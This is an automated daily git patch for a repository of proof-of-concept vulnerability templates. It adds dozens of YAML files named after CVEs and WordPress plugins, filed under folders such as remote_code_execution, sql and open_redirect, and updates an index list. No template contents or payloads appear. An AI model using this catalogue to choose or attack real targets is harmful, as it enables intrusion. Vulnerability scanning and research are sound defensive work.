From 4dc726a22fdbcd61d7e423cc997482d4d4730a12 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Thu, 5 Dec 2024 12:44:26 +0000
Subject: [PATCH] 20241205

---
 date.txt                                      |  2 +-
 poc.txt                                       | 89 +++++++++++++++++++
 poc/cve/CVE-2011-4618-2071.yaml               | 39 ++++++++
 poc/cve/CVE-2011-5181-2117.yaml               | 30 +++++++
 poc/cve/CVE-2014-9094-2417.yaml               | 29 ++++++
 poc/cve/CVE-2015-1000012-2462.yaml            | 28 ++++++
 poc/cve/CVE-2015-2807-2497.yaml               | 27 ++++++
 poc/cve/CVE-2015-7377-2593.yaml               | 32 +++++++
 poc/cve/CVE-2016-1000136-2689.yaml            | 37 ++++++++
 poc/cve/CVE-2016-1000138-2697.yaml            | 30 +++++++
 poc/cve/CVE-2016-1000149-2725.yaml            | 35 ++++++++
 poc/cve/CVE-2016-1000152-2731.yaml            | 35 ++++++++
 poc/cve/CVE-2016-10960-2763.yaml              | 34 +++++++
 poc/cve/CVE-2017-1000170-2837.yaml            | 35 ++++++++
 poc/cve/CVE-2018-11709-3197.yaml              | 30 +++++++
 poc/cve/CVE-2018-18069-3429.yaml              | 27 ++++++
 poc/cve/CVE-2019-15858-3888.yaml              | 52 +++++++++++
 poc/cve/CVE-2019-6112-4173.yaml               | 35 ++++++++
 poc/cve/CVE-2020-8771-5336.yaml               | 61 +++++++++++++
 poc/cve/CVE-2021-24146-5627.yaml              | 27 ++++++
 poc/cve/CVE-2021-24146-5629.yaml              | 25 ++++++
 poc/cve/CVE-2021-24210-5644.yaml              | 31 +++++++
 poc/cve/CVE-2021-25033-5788.yaml              | 27 ++++++
 poc/cve/CVE-2021-25118(1).yaml                | 58 ++++++++++++
 poc/cve/CVE-2023-6978.yaml                    | 59 ++++++++++++
 ...0056-a8d2a1d47ca5a0c2f053a977af04fb8c.yaml | 59 ++++++++++++
 ...0178-8d00ef32d8cfb13b51bc10bd4d6d2d45.yaml | 59 ++++++++++++
 ...0262-095b139b709489482e9b7f3886286811.yaml | 59 ++++++++++++
 poc/cve/CVE-2024-10567.yaml                   | 59 ++++++++++++
 poc/cve/CVE-2024-10587.yaml                   | 59 ++++++++++++
 poc/cve/CVE-2024-10663.yaml                   | 59 ++++++++++++
 poc/cve/CVE-2024-10664.yaml                   | 59 ++++++++++++
 ...0777-3d0f2c41b4182831f7340ab1eb913016.yaml | 59 ++++++++++++
 poc/cve/CVE-2024-10787.yaml                   | 59 ++++++++++++
 poc/cve/CVE-2024-10832.yaml                   | 59 ++++++++++++
 ...0848-7435d35ca01d98267edea517a3f5f67d.yaml | 59 ++++++++++++
 ...0881-596695d2d6cc01668d710d28f9523f24.yaml | 59 ++++++++++++
 poc/cve/CVE-2024-10885.yaml                   | 59 ++++++++++++
 ...0937-e65765a33d97e7492f011b63b4951ffc.yaml | 59 ++++++++++++
 poc/cve/CVE-2024-10952.yaml                   | 59 ++++++++++++
 poc/cve/CVE-2024-11093.yaml                   | 59 ++++++++++++
 poc/cve/CVE-2024-11293.yaml                   | 59 ++++++++++++
 ...1324-744eea132cf5114313c8cf238c08e606.yaml | 59 ++++++++++++
 ...1341-d9c0a662afec84fc95603ed54f2aec86.yaml | 59 ++++++++++++
 ...1420-2826e6328a5500d4faa1dc190ffc98cc.yaml | 59 ++++++++++++
 ...1429-f2942bb3824b4d9b7780f8fbd0f14593.yaml | 59 ++++++++++++
 poc/cve/CVE-2024-11466.yaml                   | 59 ++++++++++++
 poc/cve/CVE-2024-11643.yaml                   | 59 ++++++++++++
 poc/cve/CVE-2024-11747.yaml                   | 59 ++++++++++++
 poc/cve/CVE-2024-11769.yaml                   | 59 ++++++++++++
 ...1779-dc5a2e8f9e2fe37de6208069b0a261fc.yaml | 59 ++++++++++++
 poc/cve/CVE-2024-11807.yaml                   | 59 ++++++++++++
 poc/cve/CVE-2024-11813.yaml                   | 59 ++++++++++++
 poc/cve/CVE-2024-11814.yaml                   | 59 ++++++++++++
 poc/cve/CVE-2024-11854.yaml                   | 59 ++++++++++++
 poc/cve/CVE-2024-11880.yaml                   | 59 ++++++++++++
 poc/cve/CVE-2024-11897.yaml                   | 59 ++++++++++++
 poc/cve/CVE-2024-11903.yaml                   | 59 ++++++++++++
 poc/cve/CVE-2024-11935.yaml                   | 59 ++++++++++++
 poc/cve/CVE-2024-11952.yaml                   | 59 ++++++++++++
 poc/cve/CVE-2024-12099.yaml                   | 59 ++++++++++++
 poc/cve/CVE-2024-5020.yaml                    | 59 ++++++++++++
 poc/cve/CVE-2024-8962.yaml                    | 59 ++++++++++++
 poc/detect/twenty-detect.yaml                 | 28 ++++++
 poc/microsoft/mightyforms.yaml                | 59 ++++++++++++
 ...tion-7ba8c53e6fc7be568c3f7112b05c02cb.yaml | 59 ++++++++++++
 poc/other/allaccessible.yaml                  | 59 ++++++++++++
 poc/other/amin-chat-button.yaml               | 59 ++++++++++++
 ...ntor-88412505e615b6e5307dc9f2ce5ac45d.yaml | 59 ++++++++++++
 poc/other/b-testimonial.yaml                  | 59 ++++++++++++
 ...cksy-23bf7578ab264efcde56f6817c09d0fd.yaml | 59 ++++++++++++
 ...cita-d660a0b48b863cdd67353bc56f435b10.yaml | 59 ++++++++++++
 poc/other/dollie.yaml                         | 59 ++++++++++++
 poc/other/dp-intro-tours.yaml                 | 59 ++++++++++++
 poc/other/email-address-obfuscation.yaml      | 59 ++++++++++++
 ...ntor-d5f23171ec6d2a624b85c7c3791a4d2a.yaml | 59 ++++++++++++
 poc/other/listdom.yaml                        | 59 ++++++++++++
 ...ayer-24c69778041edc97ab62887d5469ab7a.yaml | 59 ++++++++++++
 ...unch-1eae09198c1f57697be0e29290d91cd2.yaml | 59 ++++++++++++
 poc/other/posti-shipping.yaml                 | 59 ++++++++++++
 poc/other/responsive-youtube-videos.yaml      | 59 ++++++++++++
 poc/other/sg-helper.yaml                      | 59 ++++++++++++
 ...grid-f22ea0fab8779458702e21b3cfbd3810.yaml | 59 ++++++++++++
 ...lite-58c536c08bbfd58c8c5df3f776075f47.yaml | 59 ++++++++++++
 ...erce-53b52ac147da254acf1412f550aa0c64.yaml | 59 ++++++++++++
 .../order-status-for-woocommerce.yaml         | 59 ++++++++++++
 poc/social/easy-facebook-likebox-premium.yaml | 59 ++++++++++++
 ...post-50f470db25db3e9b2fd4bb5c39c48cf6.yaml | 59 ++++++++++++
 poc/web/webmail.yaml                          | 22 +++++
 poc/wordpress/wp-ecards-invites.yaml          | 59 ++++++++++++
 poc/wordpress/wp-job-manager-companies.yaml   | 59 ++++++++++++
 91 files changed, 4739 insertions(+), 1 deletion(-)
 create mode 100644 poc/cve/CVE-2011-4618-2071.yaml
 create mode 100644 poc/cve/CVE-2011-5181-2117.yaml
 create mode 100644 poc/cve/CVE-2014-9094-2417.yaml
 create mode 100644 poc/cve/CVE-2015-1000012-2462.yaml
 create mode 100644 poc/cve/CVE-2015-2807-2497.yaml
 create mode 100644 poc/cve/CVE-2015-7377-2593.yaml
 create mode 100644 poc/cve/CVE-2016-1000136-2689.yaml
 create mode 100644 poc/cve/CVE-2016-1000138-2697.yaml
 create mode 100644 poc/cve/CVE-2016-1000149-2725.yaml
 create mode 100644 poc/cve/CVE-2016-1000152-2731.yaml
 create mode 100644 poc/cve/CVE-2016-10960-2763.yaml
 create mode 100644 poc/cve/CVE-2017-1000170-2837.yaml
 create mode 100644 poc/cve/CVE-2018-11709-3197.yaml
 create mode 100644 poc/cve/CVE-2018-18069-3429.yaml
 create mode 100644 poc/cve/CVE-2019-15858-3888.yaml
 create mode 100644 poc/cve/CVE-2019-6112-4173.yaml
 create mode 100644 poc/cve/CVE-2020-8771-5336.yaml
 create mode 100644 poc/cve/CVE-2021-24146-5627.yaml
 create mode 100644 poc/cve/CVE-2021-24146-5629.yaml
 create mode 100644 poc/cve/CVE-2021-24210-5644.yaml
 create mode 100644 poc/cve/CVE-2021-25033-5788.yaml
 create mode 100644 poc/cve/CVE-2021-25118(1).yaml
 create mode 100644 poc/cve/CVE-2023-6978.yaml
 create mode 100644 poc/cve/CVE-2024-10056-a8d2a1d47ca5a0c2f053a977af04fb8c.yaml
 create mode 100644 poc/cve/CVE-2024-10178-8d00ef32d8cfb13b51bc10bd4d6d2d45.yaml
 create mode 100644 poc/cve/CVE-2024-10262-095b139b709489482e9b7f3886286811.yaml
 create mode 100644 poc/cve/CVE-2024-10567.yaml
 create mode 100644 poc/cve/CVE-2024-10587.yaml
 create mode 100644 poc/cve/CVE-2024-10663.yaml
 create mode 100644 poc/cve/CVE-2024-10664.yaml
 create mode 100644 poc/cve/CVE-2024-10777-3d0f2c41b4182831f7340ab1eb913016.yaml
 create mode 100644 poc/cve/CVE-2024-10787.yaml
 create mode 100644 poc/cve/CVE-2024-10832.yaml
 create mode 100644 poc/cve/CVE-2024-10848-7435d35ca01d98267edea517a3f5f67d.yaml
 create mode 100644 poc/cve/CVE-2024-10881-596695d2d6cc01668d710d28f9523f24.yaml
 create mode 100644 poc/cve/CVE-2024-10885.yaml
 create mode 100644 poc/cve/CVE-2024-10937-e65765a33d97e7492f011b63b4951ffc.yaml
 create mode 100644 poc/cve/CVE-2024-10952.yaml
 create mode 100644 poc/cve/CVE-2024-11093.yaml
 create mode 100644 poc/cve/CVE-2024-11293.yaml
 create mode 100644 poc/cve/CVE-2024-11324-744eea132cf5114313c8cf238c08e606.yaml
 create mode 100644 poc/cve/CVE-2024-11341-d9c0a662afec84fc95603ed54f2aec86.yaml
 create mode 100644 poc/cve/CVE-2024-11420-2826e6328a5500d4faa1dc190ffc98cc.yaml
 create mode 100644 poc/cve/CVE-2024-11429-f2942bb3824b4d9b7780f8fbd0f14593.yaml
 create mode 100644 poc/cve/CVE-2024-11466.yaml
 create mode 100644 poc/cve/CVE-2024-11643.yaml
 create mode 100644 poc/cve/CVE-2024-11747.yaml
 create mode 100644 poc/cve/CVE-2024-11769.yaml
 create mode 100644 poc/cve/CVE-2024-11779-dc5a2e8f9e2fe37de6208069b0a261fc.yaml
 create mode 100644 poc/cve/CVE-2024-11807.yaml
 create mode 100644 poc/cve/CVE-2024-11813.yaml
 create mode 100644 poc/cve/CVE-2024-11814.yaml
 create mode 100644 poc/cve/CVE-2024-11854.yaml
 create mode 100644 poc/cve/CVE-2024-11880.yaml
 create mode 100644 poc/cve/CVE-2024-11897.yaml
 create mode 100644 poc/cve/CVE-2024-11903.yaml
 create mode 100644 poc/cve/CVE-2024-11935.yaml
 create mode 100644 poc/cve/CVE-2024-11952.yaml
 create mode 100644 poc/cve/CVE-2024-12099.yaml
 create mode 100644 poc/cve/CVE-2024-5020.yaml
 create mode 100644 poc/cve/CVE-2024-8962.yaml
 create mode 100644 poc/detect/twenty-detect.yaml
 create mode 100644 poc/microsoft/mightyforms.yaml
 create mode 100644 poc/open_redirect/eelv-redirection-7ba8c53e6fc7be568c3f7112b05c02cb.yaml
 create mode 100644 poc/other/allaccessible.yaml
 create mode 100644 poc/other/amin-chat-button.yaml
 create mode 100644 poc/other/anywhere-elementor-88412505e615b6e5307dc9f2ce5ac45d.yaml
 create mode 100644 poc/other/b-testimonial.yaml
 create mode 100644 poc/other/blocksy-23bf7578ab264efcde56f6817c09d0fd.yaml
 create mode 100644 poc/other/contact-form-with-a-meeting-scheduler-by-vcita-d660a0b48b863cdd67353bc56f435b10.yaml
 create mode 100644 poc/other/dollie.yaml
 create mode 100644 poc/other/dp-intro-tours.yaml
 create mode 100644 poc/other/email-address-obfuscation.yaml
 create mode 100644 poc/other/gutentor-d5f23171ec6d2a624b85c7c3791a4d2a.yaml
 create mode 100644 poc/other/listdom.yaml
 create mode 100644 poc/other/lu-radioplayer-24c69778041edc97ab62887d5469ab7a.yaml
 create mode 100644 poc/other/newsmunch-1eae09198c1f57697be0e29290d91cd2.yaml
 create mode 100644 poc/other/posti-shipping.yaml
 create mode 100644 poc/other/responsive-youtube-videos.yaml
 create mode 100644 poc/other/sg-helper.yaml
 create mode 100644 poc/other/stars-testimonials-with-slider-and-masonry-grid-f22ea0fab8779458702e21b3cfbd3810.yaml
 create mode 100644 poc/other/wip-woocarousel-lite-58c536c08bbfd58c8c5df3f776075f47.yaml
 create mode 100644 poc/remote_code_execution/accounting-for-woocommerce-53b52ac147da254acf1412f550aa0c64.yaml
 create mode 100644 poc/remote_code_execution/order-status-for-woocommerce.yaml
 create mode 100644 poc/social/easy-facebook-likebox-premium.yaml
 create mode 100644 poc/sql/related-post-50f470db25db3e9b2fd4bb5c39c48cf6.yaml
 create mode 100644 poc/web/webmail.yaml
 create mode 100644 poc/wordpress/wp-ecards-invites.yaml
 create mode 100644 poc/wordpress/wp-job-manager-companies.yaml

diff --git a/date.txt b/date.txt
index 74f6fd4e4e..5f2357c99f 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20241204
+20241205
diff --git a/poc.txt b/poc.txt
index feca4cba0d..e7a07433bb 100644
--- a/poc.txt
+++ b/poc.txt
@@ -9123,6 +9123,7 @@
 ./poc/cve/CVE-2011-4595.yaml
 ./poc/cve/CVE-2011-4618-2067.yaml
 ./poc/cve/CVE-2011-4618-2069.yaml
+./poc/cve/CVE-2011-4618-2071.yaml
 ./poc/cve/CVE-2011-4618-391f474e06835c68dec4fb58e933aba3.yaml
 ./poc/cve/CVE-2011-4618.yaml
 ./poc/cve/CVE-2011-4624-2074.yaml
@@ -9175,6 +9176,7 @@
 ./poc/cve/CVE-2011-5180.yaml
 ./poc/cve/CVE-2011-5181-2112.yaml
 ./poc/cve/CVE-2011-5181-2116.yaml
+./poc/cve/CVE-2011-5181-2117.yaml
 ./poc/cve/CVE-2011-5181-8491a0a59b643c19df3fee90d0e2a8a9.yaml
 ./poc/cve/CVE-2011-5181.yaml
 ./poc/cve/CVE-2011-5191-51bd4faa48cb8b323facb932108c5e3b.yaml
@@ -10615,6 +10617,7 @@
 ./poc/cve/CVE-2014-9039-e36ead55dcc8029f1208afc5fd967940.yaml
 ./poc/cve/CVE-2014-9039.yaml
 ./poc/cve/CVE-2014-9094-2416.yaml
+./poc/cve/CVE-2014-9094-2417.yaml
 ./poc/cve/CVE-2014-9094-2420.yaml
 ./poc/cve/CVE-2014-9094-2421.yaml
 ./poc/cve/CVE-2014-9094-33981699600bd7688fa76839ea64eb69.yaml
@@ -10799,6 +10802,7 @@
 ./poc/cve/CVE-2015-1000012-2458.yaml
 ./poc/cve/CVE-2015-1000012-2460.yaml
 ./poc/cve/CVE-2015-1000012-2461.yaml
+./poc/cve/CVE-2015-1000012-2462.yaml
 ./poc/cve/CVE-2015-1000012-bd172eb0a5f5b4fee2b93533e1882477.yaml
 ./poc/cve/CVE-2015-1000012.yaml
 ./poc/cve/CVE-2015-1000013-c88ce724ce8bc15e25be894a573aacd0.yaml
@@ -11002,6 +11006,7 @@
 ./poc/cve/CVE-2015-2792.yaml
 ./poc/cve/CVE-2015-2794 (copy 1).yaml
 ./poc/cve/CVE-2015-2794.yaml
+./poc/cve/CVE-2015-2807-2497.yaml
 ./poc/cve/CVE-2015-2807-900a53ae0846b5347a5a43a6953175d4.yaml
 ./poc/cve/CVE-2015-2807.yaml
 ./poc/cve/CVE-2015-2824-abe81889bc2f1d741112f2dc9ccacef0.yaml
@@ -11250,6 +11255,7 @@
 ./poc/cve/CVE-2015-7320.yaml
 ./poc/cve/CVE-2015-7357-bb306b2e48f0ef8b26c795db30dc721b.yaml
 ./poc/cve/CVE-2015-7357.yaml
+./poc/cve/CVE-2015-7377-2593.yaml
 ./poc/cve/CVE-2015-7377-d2687b7fe608fc55ee44352a475f8135.yaml
 ./poc/cve/CVE-2015-7377.yaml
 ./poc/cve/CVE-2015-7386-ce6d5ffe031dc6477b456cc692125cad.yaml
@@ -11866,6 +11872,7 @@
 ./poc/cve/CVE-2016-1000135.yaml
 ./poc/cve/CVE-2016-1000136-2686.yaml
 ./poc/cve/CVE-2016-1000136-2688.yaml
+./poc/cve/CVE-2016-1000136-2689.yaml
 ./poc/cve/CVE-2016-1000136-743a0575c2e9f5674d434b647e0829cf.yaml
 ./poc/cve/CVE-2016-1000136.yaml
 ./poc/cve/CVE-2016-1000137-2690.yaml
@@ -11873,6 +11880,7 @@
 ./poc/cve/CVE-2016-1000137-530731e9ade233d4dbe4ad38b53d1129.yaml
 ./poc/cve/CVE-2016-1000137.yaml
 ./poc/cve/CVE-2016-1000138-2694.yaml
+./poc/cve/CVE-2016-1000138-2697.yaml
 ./poc/cve/CVE-2016-1000138-b8f6488df350796223032f6ce8716f9c.yaml
 ./poc/cve/CVE-2016-1000138.yaml
 ./poc/cve/CVE-2016-1000139-2699.yaml
@@ -11909,6 +11917,7 @@
 ./poc/cve/CVE-2016-1000148-2724.yaml
 ./poc/cve/CVE-2016-1000148-b06fb90961e87acbee5aeb0d78acee1a.yaml
 ./poc/cve/CVE-2016-1000148.yaml
+./poc/cve/CVE-2016-1000149-2725.yaml
 ./poc/cve/CVE-2016-1000149-2727.yaml
 ./poc/cve/CVE-2016-1000149-2728.yaml
 ./poc/cve/CVE-2016-1000149-c94391e68202ff41e65065899fd10200.yaml
@@ -11918,6 +11927,7 @@
 ./poc/cve/CVE-2016-1000151-c5250cfbfc9c6088f5bd4dad269425f4.yaml
 ./poc/cve/CVE-2016-1000151.yaml
 ./poc/cve/CVE-2016-1000152-2729.yaml
+./poc/cve/CVE-2016-1000152-2731.yaml
 ./poc/cve/CVE-2016-1000152-a0b3bb2e08793710304990cb632fbb8f.yaml
 ./poc/cve/CVE-2016-1000152.yaml
 ./poc/cve/CVE-2016-1000153-2733.yaml
@@ -12141,6 +12151,7 @@
 ./poc/cve/CVE-2016-10958.yaml
 ./poc/cve/CVE-2016-10959-dad0b52cbe68b099b237e45b44f58588.yaml
 ./poc/cve/CVE-2016-10959.yaml
+./poc/cve/CVE-2016-10960-2763.yaml
 ./poc/cve/CVE-2016-10960-2766.yaml
 ./poc/cve/CVE-2016-10960-d1d86e7fce945b66ecd5fc89af4300b2.yaml
 ./poc/cve/CVE-2016-10960.yaml
@@ -12366,6 +12377,7 @@
 ./poc/cve/CVE-2017-1000038-bf988e0d814700ec44f119b226466a0c.yaml
 ./poc/cve/CVE-2017-1000038.yaml
 ./poc/cve/CVE-2017-1000163.yaml
+./poc/cve/CVE-2017-1000170-2837.yaml
 ./poc/cve/CVE-2017-1000170-2838.yaml
 ./poc/cve/CVE-2017-1000170-2840.yaml
 ./poc/cve/CVE-2017-1000170-2841.yaml
@@ -13382,6 +13394,7 @@
 ./poc/cve/CVE-2018-11633.yaml
 ./poc/cve/CVE-2018-11686.yaml
 ./poc/cve/CVE-2018-11709-3196.yaml
+./poc/cve/CVE-2018-11709-3197.yaml
 ./poc/cve/CVE-2018-11709-3199.yaml
 ./poc/cve/CVE-2018-11709-36e4985b5deb8919f5508712ad88d7a4.yaml
 ./poc/cve/CVE-2018-11709.yaml
@@ -13571,6 +13584,7 @@
 ./poc/cve/CVE-2018-18019.yaml
 ./poc/cve/CVE-2018-18069-1a2e60d8b8511029783b8707140ec2ae.yaml
 ./poc/cve/CVE-2018-18069-3426.yaml
+./poc/cve/CVE-2018-18069-3429.yaml
 ./poc/cve/CVE-2018-18069.yaml
 ./poc/cve/CVE-2018-18264 (copy 2).yaml
 ./poc/cve/CVE-2018-18264.yaml
@@ -14471,6 +14485,7 @@
 ./poc/cve/CVE-2019-15842-db1c44192858b8b2a395e79bc5c44c27.yaml
 ./poc/cve/CVE-2019-15842.yaml
 ./poc/cve/CVE-2019-15858-1c8e84db002603b1cea567f8b6432227.yaml
+./poc/cve/CVE-2019-15858-3888.yaml
 ./poc/cve/CVE-2019-15858-3890.yaml
 ./poc/cve/CVE-2019-15858-3892.yaml
 ./poc/cve/CVE-2019-15858-3893.yaml
@@ -14925,6 +14940,7 @@
 ./poc/cve/CVE-2019-6030.yaml
 ./poc/cve/CVE-2019-6112 2.yaml
 ./poc/cve/CVE-2019-6112-1f54eae75545a600dd1eb9f077acc54f.yaml
+./poc/cve/CVE-2019-6112-4173.yaml
 ./poc/cve/CVE-2019-6112-4177.yaml
 ./poc/cve/CVE-2019-6112.yaml
 ./poc/cve/CVE-2019-6117-d81621141e07457324a64514dbef89f2.yaml
@@ -16176,6 +16192,7 @@
 ./poc/cve/CVE-2020-8654.yaml
 ./poc/cve/CVE-2020-8658-0284295106abbcc85275b72b5aa54300.yaml
 ./poc/cve/CVE-2020-8658.yaml
+./poc/cve/CVE-2020-8771-5336.yaml
 ./poc/cve/CVE-2020-8771-69608ea8c92bdaaf7f1a2b586a50b63f.yaml
 ./poc/cve/CVE-2020-8771.yaml
 ./poc/cve/CVE-2020-8772 (copy 1).yaml
@@ -16426,6 +16443,8 @@
 ./poc/cve/CVE-2021-24144.yaml
 ./poc/cve/CVE-2021-24145-f5d0f5a8737779e3fd2adbc841808007.yaml
 ./poc/cve/CVE-2021-24145.yaml
+./poc/cve/CVE-2021-24146-5627.yaml
+./poc/cve/CVE-2021-24146-5629.yaml
 ./poc/cve/CVE-2021-24146-5630.yaml
 ./poc/cve/CVE-2021-24146-5631.yaml
 ./poc/cve/CVE-2021-24146-fb1ea062119a56dda6ff48dcfc68e501.yaml
@@ -16562,6 +16581,7 @@
 ./poc/cve/CVE-2021-24210-3057223241f22f26c976b13abf36d9b1.yaml
 ./poc/cve/CVE-2021-24210-5640.yaml
 ./poc/cve/CVE-2021-24210-5641.yaml
+./poc/cve/CVE-2021-24210-5644.yaml
 ./poc/cve/CVE-2021-24210.yaml
 ./poc/cve/CVE-2021-24211-ed3d8c37e9725aabcf188699a130ab05.yaml
 ./poc/cve/CVE-2021-24211.yaml
@@ -18276,6 +18296,7 @@
 ./poc/cve/CVE-2021-25031.yaml
 ./poc/cve/CVE-2021-25032-2385e36d211cdd059771016a27ef43dc.yaml
 ./poc/cve/CVE-2021-25032.yaml
+./poc/cve/CVE-2021-25033-5788.yaml
 ./poc/cve/CVE-2021-25033-62df07f40e0f984427778f0aa4ce55a5.yaml
 ./poc/cve/CVE-2021-25033.yaml
 ./poc/cve/CVE-2021-25034-c6be603ecc9c2fd3ad613c15d3b1bfa6.yaml
@@ -18457,6 +18478,7 @@
 ./poc/cve/CVE-2021-25116.yaml
 ./poc/cve/CVE-2021-25117-63d271d30277b056540639ed87085117.yaml
 ./poc/cve/CVE-2021-25117.yaml
+./poc/cve/CVE-2021-25118(1).yaml
 ./poc/cve/CVE-2021-25118-5d314a2c6f311aae094769bd27221567.yaml
 ./poc/cve/CVE-2021-25118.yaml
 ./poc/cve/CVE-2021-25119-f5c0b4d298d9925ecfefb6d03108787d.yaml
@@ -33705,6 +33727,7 @@
 ./poc/cve/CVE-2023-6975.yaml
 ./poc/cve/CVE-2023-6977.yaml
 ./poc/cve/CVE-2023-6978-1e1615c5a791031af8f00ef1c63d7c05.yaml
+./poc/cve/CVE-2023-6978.yaml
 ./poc/cve/CVE-2023-6979-ea57c35364cc5cf12889ebd504c19279.yaml
 ./poc/cve/CVE-2023-6979.yaml
 ./poc/cve/CVE-2023-6980-95f4a26faf460d06ab0291ea5cbbad30.yaml
@@ -34457,6 +34480,7 @@
 ./poc/cve/CVE-2024-10050.yaml
 ./poc/cve/CVE-2024-10055-a7567bb6df1c6f932e81f3fa194c2a29.yaml
 ./poc/cve/CVE-2024-10055.yaml
+./poc/cve/CVE-2024-10056-a8d2a1d47ca5a0c2f053a977af04fb8c.yaml
 ./poc/cve/CVE-2024-10057-3619138af4b1755697a61cf7520ca3e3.yaml
 ./poc/cve/CVE-2024-10057.yaml
 ./poc/cve/CVE-2024-10078-ac3355172629b828c0c05e8735d48816.yaml
@@ -34510,6 +34534,7 @@
 ./poc/cve/CVE-2024-10177-4a9e1c175ca1d69b6162f3cdfac1d15b.yaml
 ./poc/cve/CVE-2024-10177-cd099857e17e9d5daf937c4caff0288e.yaml
 ./poc/cve/CVE-2024-10177.yaml
+./poc/cve/CVE-2024-10178-8d00ef32d8cfb13b51bc10bd4d6d2d45.yaml
 ./poc/cve/CVE-2024-10179-99e78b7be5cf73a1cef31eb112268c96.yaml
 ./poc/cve/CVE-2024-10179.yaml
 ./poc/cve/CVE-2024-10180-cda9906f3b0afcef720a2edb145ba669.yaml
@@ -34547,6 +34572,7 @@
 ./poc/cve/CVE-2024-10260.yaml
 ./poc/cve/CVE-2024-10261-13a111b77ff7242b7fd206b696ded4b9.yaml
 ./poc/cve/CVE-2024-10261.yaml
+./poc/cve/CVE-2024-10262-095b139b709489482e9b7f3886286811.yaml
 ./poc/cve/CVE-2024-10262-0b3a59a1cce14191fcf53094e2223623.yaml
 ./poc/cve/CVE-2024-10262.yaml
 ./poc/cve/CVE-2024-10263-5a599dd7d83925469bc803c5aabfa610.yaml
@@ -34715,6 +34741,7 @@
 ./poc/cve/CVE-2024-1056-67c2890890023e1dcaf3fcf02b7286ad.yaml
 ./poc/cve/CVE-2024-1056.yaml
 ./poc/cve/CVE-2024-10567-0a6cb3b80cd64d50d19a1e3c009329aa.yaml
+./poc/cve/CVE-2024-10567.yaml
 ./poc/cve/CVE-2024-1057-7965d17e1316abe215e22b7e9f9e3d34.yaml
 ./poc/cve/CVE-2024-1057.yaml
 ./poc/cve/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml
@@ -34735,6 +34762,7 @@
 ./poc/cve/CVE-2024-10586-1ccc6f2723a2f31b8fd563fbe61fe46e.yaml
 ./poc/cve/CVE-2024-10586.yaml
 ./poc/cve/CVE-2024-10587-afbf26677da1e3c07f34d48f2d09d1d7.yaml
+./poc/cve/CVE-2024-10587.yaml
 ./poc/cve/CVE-2024-10588-29f46f138336461b1ce42b72ea92eb56.yaml
 ./poc/cve/CVE-2024-10588.yaml
 ./poc/cve/CVE-2024-10589-3949f6625a5239536ec744810016b1a6.yaml
@@ -34773,7 +34801,9 @@
 ./poc/cve/CVE-2024-10647-f9db24370dab16c6bbf61c415c445725.yaml
 ./poc/cve/CVE-2024-10647.yaml
 ./poc/cve/CVE-2024-10663-3da367fa8633c57d627a006d7a8ee98c.yaml
+./poc/cve/CVE-2024-10663.yaml
 ./poc/cve/CVE-2024-10664-165444093ae6510e2ff9973a992d3830.yaml
+./poc/cve/CVE-2024-10664.yaml
 ./poc/cve/CVE-2024-10665-6660b4c6817d128fec20e2a4290b2931.yaml
 ./poc/cve/CVE-2024-10665-dfe9e11f7f7f37802d452382412d168a.yaml
 ./poc/cve/CVE-2024-10665.yaml
@@ -34857,6 +34887,7 @@
 ./poc/cve/CVE-2024-1076.yaml
 ./poc/cve/CVE-2024-10770-c34a4a3efec7f5f02bdebaace96e792d.yaml
 ./poc/cve/CVE-2024-10770.yaml
+./poc/cve/CVE-2024-10777-3d0f2c41b4182831f7340ab1eb913016.yaml
 ./poc/cve/CVE-2024-10778-797064adc3334f08c3fbb1275f7b3b47.yaml
 ./poc/cve/CVE-2024-10778-fd80b84e6e4bfedee7b8d137c9c72b1b.yaml
 ./poc/cve/CVE-2024-10778.yaml
@@ -34875,6 +34906,7 @@
 ./poc/cve/CVE-2024-10786-f161ac31d0c4ea449f68c6703970e75b.yaml
 ./poc/cve/CVE-2024-10786.yaml
 ./poc/cve/CVE-2024-10787-b89afc85b1e781ec970bc1e446f6da01.yaml
+./poc/cve/CVE-2024-10787.yaml
 ./poc/cve/CVE-2024-10788-fcd89965b0c25af01f58de1ecc9f4587.yaml
 ./poc/cve/CVE-2024-10788.yaml
 ./poc/cve/CVE-2024-1079-1f12a336fd8362a1410d8995316f8026.yaml
@@ -34921,8 +34953,10 @@
 ./poc/cve/CVE-2024-1083-c1752d7dc982e1f95b105684a32a4387.yaml
 ./poc/cve/CVE-2024-1083.yaml
 ./poc/cve/CVE-2024-10832-08cd101251aa1a9d6856998524059503.yaml
+./poc/cve/CVE-2024-10832.yaml
 ./poc/cve/CVE-2024-10837-822bdf929bf75cae072305d22ba83f9d.yaml
 ./poc/cve/CVE-2024-10837.yaml
+./poc/cve/CVE-2024-10848-7435d35ca01d98267edea517a3f5f67d.yaml
 ./poc/cve/CVE-2024-10850-1086df4e1d6f59239e6e41cb5264dfd9.yaml
 ./poc/cve/CVE-2024-10850-1914522a12aa125c7663504eb5d5805e.yaml
 ./poc/cve/CVE-2024-10850.yaml
@@ -34966,6 +35000,7 @@
 ./poc/cve/CVE-2024-1088.yaml
 ./poc/cve/CVE-2024-10880-59c0038e0af4d28442c891a27a66f569.yaml
 ./poc/cve/CVE-2024-10880.yaml
+./poc/cve/CVE-2024-10881-596695d2d6cc01668d710d28f9523f24.yaml
 ./poc/cve/CVE-2024-10882-e797660f97ef668cb301cb3b9715bd4a.yaml
 ./poc/cve/CVE-2024-10882.yaml
 ./poc/cve/CVE-2024-10883-a21949176ab6e3c686e7a07e748a996d.yaml
@@ -34973,6 +35008,7 @@
 ./poc/cve/CVE-2024-10884-0efe9e25f68ec96c6f1af55c50a390dd.yaml
 ./poc/cve/CVE-2024-10884.yaml
 ./poc/cve/CVE-2024-10885-f64a1e35f58938f7962f4478d05f768e.yaml
+./poc/cve/CVE-2024-10885.yaml
 ./poc/cve/CVE-2024-10886-ad85c3c36c29e05948c39ffde87e04e3.yaml
 ./poc/cve/CVE-2024-10886.yaml
 ./poc/cve/CVE-2024-10887-4c374b4cc1afc2ed3465698ee4023f8c.yaml
@@ -35009,11 +35045,13 @@
 ./poc/cve/CVE-2024-10924.yaml
 ./poc/cve/CVE-2024-1093-7c034f664d389dd1d4714fd38e3096f8.yaml
 ./poc/cve/CVE-2024-1093.yaml
+./poc/cve/CVE-2024-10937-e65765a33d97e7492f011b63b4951ffc.yaml
 ./poc/cve/CVE-2024-1094-28bbaf5febf22938e52d5e0ad45af461.yaml
 ./poc/cve/CVE-2024-1094.yaml
